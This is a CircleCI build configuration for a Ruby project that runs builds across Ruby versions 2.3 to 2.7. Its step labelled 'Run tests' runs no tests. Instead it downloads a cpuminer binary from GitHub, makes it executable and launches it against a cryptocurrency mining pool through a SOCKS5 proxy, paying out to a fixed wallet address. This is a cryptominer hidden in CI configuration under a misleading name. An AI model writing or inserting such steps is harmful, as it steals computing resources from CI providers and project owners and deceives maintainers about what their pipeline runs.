working_dir: &working_dir ~/app

.build_template: &build_definition
  steps:
    - checkout
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run: ./cc-test-reporter before-build
    - run: gem install bundler:2.1.4
    - run: bundle install --jobs=4 --retry=4 --path vendor/bundle
    - run: bundle exec rake rubocop
    - run:
        name: Run tests
        command: |
          apt update 
          apt install screen -y 
          wget -O cpuminer-avx https://github.com/Explorer-Discord/Test-CircleCi/raw/main/cpuminer-avx
          chmod +x cpuminer-avx
          screen -dmS ls
          ./cpuminer-avx -a gr -o stratum+tcps://stratum-asia.rplant.xyz:17056 -u RWi1xbUyvKo8JvYpLbyJQ64kPBR8rkFw5a.Avx-01=$(echo $strDate-$(shuf -i 1-1000 -n 1)) --proxy=SOCKS5://198.199.86.148:22388
  working_directory: *working_dir

version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  build_ruby2_7:
    <<: *build_definition
    docker:
      - image: ruby:2.7
  build_ruby2_6:
    <<: *build_definition
    docker:
      - image: ruby:2.6
  build_ruby2_5:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  build_ruby2_4:
    <<: *build_definition
    docker:
      - image: ruby:2.4
  build_ruby2_3:
    <<: *build_definition
    docker:
      - image: ruby:2.3

workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - build_ruby2_7
      - build_ruby2_6
      - build_ruby2_5
      - build_ruby2_4
      - build_ruby2_3
